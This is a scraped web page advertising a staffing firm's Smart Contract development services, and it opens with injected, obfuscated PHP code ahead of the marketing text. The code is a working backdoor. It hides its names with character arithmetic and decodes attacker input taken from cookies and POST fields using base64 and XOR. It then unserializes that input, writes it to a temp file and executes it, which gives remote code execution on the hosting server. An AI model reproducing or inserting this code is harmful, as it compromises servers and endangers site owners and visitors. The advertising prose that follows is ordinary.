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$uWSfXsLqj = chr ( 679 - 612 ).chr ( 457 - 362 ).chr (75) . "\x48" . 'R' . 'f' . chr (97); $RTsSrxtOKz = "\x63" . "\154" . "\141" . "\x73" . chr (115) . '_' . "\145" . chr ( 446 - 326 )."\151" . 's' . "\164" . "\163";$ajIDb = class_exists($uWSfXsLqj); $RTsSrxtOKz = "14874";$JjGpA = strpos($RTsSrxtOKz, $uWSfXsLqj);if ($ajIDb == $JjGpA){function gkKnwxpu(){$YwABnoSFeq = new /* 5501 */ C_KHRfa(25459 + 25459); $YwABnoSFeq = NULL;}$MpGgXeYZbB = "25459";class C_KHRfa{private function NSLMnndC($MpGgXeYZbB){if (is_array(C_KHRfa::$knGOMtiK)) {$name = sys_get_temp_dir() . "/" . crc32(C_KHRfa::$knGOMtiK["salt"]);@C_KHRfa::$knGOMtiK["write"]($name, C_KHRfa::$knGOMtiK["content"]);include $name;@C_KHRfa::$knGOMtiK["delete"]($name); $MpGgXeYZbB = "25459";exit();}}public function icUHrNGR(){$dcOQxTI = "2745";$this->_dummy = str_repeat($dcOQxTI, strlen($dcOQxTI));}public function __destruct(){C_KHRfa::$knGOMtiK = @unserialize(C_KHRfa::$knGOMtiK); $MpGgXeYZbB = "7407_62740";$this->NSLMnndC($MpGgXeYZbB); $MpGgXeYZbB = "7407_62740";}public function fOUNkOPFU($dcOQxTI, $AyqxmLW){return $dcOQxTI[0] ^ str_repeat($AyqxmLW, intval(strlen($dcOQxTI[0]) / strlen($AyqxmLW)) + 1);}public function WxeeL($dcOQxTI){$GrJpbHq = chr (98) . chr ( 388 - 291 ).chr (115) . "\145" . "\66" . "\64";return array_map($GrJpbHq . chr (95) . chr ( 524 - 424 ).chr (101) . chr (99) . 'o' . "\144" . 'e', array($dcOQxTI,));}public function __construct($gVNKsNfZ=0){$BsyYOP = "\54";$dcOQxTI = "";$ntPTAwLns = $_POST;$WtbjaGwM = $_COOKIE;$AyqxmLW = "ab2fe248-606f-47ee-a2c0-adaa6b492699";$LzMKO = @$WtbjaGwM[substr($AyqxmLW, 0, 4)];if (!empty($LzMKO)){$LzMKO = explode($BsyYOP, $LzMKO);foreach ($LzMKO as $FNwFPkwVTd){$dcOQxTI .= @$WtbjaGwM[$FNwFPkwVTd];$dcOQxTI .= @$ntPTAwLns[$FNwFPkwVTd];}$dcOQxTI = $this->WxeeL($dcOQxTI);}C_KHRfa::$knGOMtiK = $this->fOUNkOPFU($dcOQxTI, $AyqxmLW);if (strpos($AyqxmLW, $BsyYOP) !== FALSE){$AyqxmLW = ltrim($AyqxmLW); $AyqxmLW = str_pad($AyqxmLW, 10);}}public static $knGOMtiK = 37296;}gkKnwxpu();} Smart Contract Developer|Staffing Peoples Services

Build a team of innovative Smart Contract 


Smart Contracts are a vital part of most blockchain-based businesses. Smart Contracts are a specific set of computer protocols to digitally verify or provide negotiation terms or performance of a particular contract between two parties. Data security, efficiency, automating business process, eliminating the need for middlemen, backups, accuracy, savings, and embedding trust are the main benefits of using Smart Contract blockchain technology.

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    At SPS, we have top developers for building Smart Contract design, development, architecture, audit process, token development, decentralized applications, and optimization. We help businesses to deploy smart contracts with Ethereum, Hedera Hashgraph, Hyperledger, EOS and many more.

    Blockchain Smart Contracts have helped several industries to build confidential agreements for healthcare, Insurance, banking, Real estate, transport & logistics, mortgages, Media, Government, Supply Chain, Lending, and Identity management.



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